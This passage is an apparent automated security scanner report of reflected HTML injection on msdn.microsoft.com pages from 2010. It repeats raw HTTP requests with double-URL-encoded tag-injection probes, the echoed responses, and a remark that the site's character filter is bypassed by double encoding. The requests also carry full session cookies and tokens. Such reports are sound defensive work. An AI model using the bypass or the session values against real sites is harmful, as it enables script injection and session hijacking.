17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:56 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9e35f"><a>9fb18031369/ee725279" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919d4%2522%253e%253ca%253e262395ba879 was submitted in the REST URL parameter 3. This input was echoed as 919d4"><a>262395ba879 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee725279.aspx919d4%2522%253e%253ca%253e262395ba879 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee725279.aspx919d4"><a>262395ba879" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5fa%2522%253e%253ca%253ee12a11fc95d was submitted in the REST URL parameter 1. This input was echoed as 2d5fa"><a>e12a11fc95d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us2d5fa%2522%253e%253ca%253ee12a11fc95d/library/ff361664.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us2d5fa"><a>e12a11fc95d/library/ff361664" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de6e%2522%253e%253ca%253ee545caa6f17 was submitted in the REST URL parameter 2. This input was echoed as 5de6e"><a>e545caa6f17 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library5de6e%2522%253e%253ca%253ee545caa6f17/ff361664.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5de6e"><a>e545caa6f17/ff361664" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18998%2522%253e%253ca%253e4dd5a078452 was submitted in the REST URL parameter 3. This input was echoed as 18998"><a>4dd5a078452 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ff361664.aspx18998%2522%253e%253ca%253e4dd5a078452 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff361664.aspx18998"><a>4dd5a078452" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c821%2522%253e%253ca%253ede13ab68088 was submitted in the REST URL parameter 1. This input was echoed as 3c821"><a>de13ab68088 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us3c821%2522%253e%253ca%253ede13ab68088/library/ff921345.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3c821"><a>de13ab68088/library/ff921345" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c33c4%2522%253e%253ca%253eb63170bd290 was submitted in the REST URL parameter 2. This input was echoed as c33c4"><a>b63170bd290 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryc33c4%2522%253e%253ca%253eb63170bd290/ff921345.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc33c4"><a>b63170bd290/ff921345" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc4f%2522%253e%253ca%253ea5cb942ec49 was submitted in the REST URL parameter 3. This input was echoed as 3fc4f"><a>a5cb942ec49 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
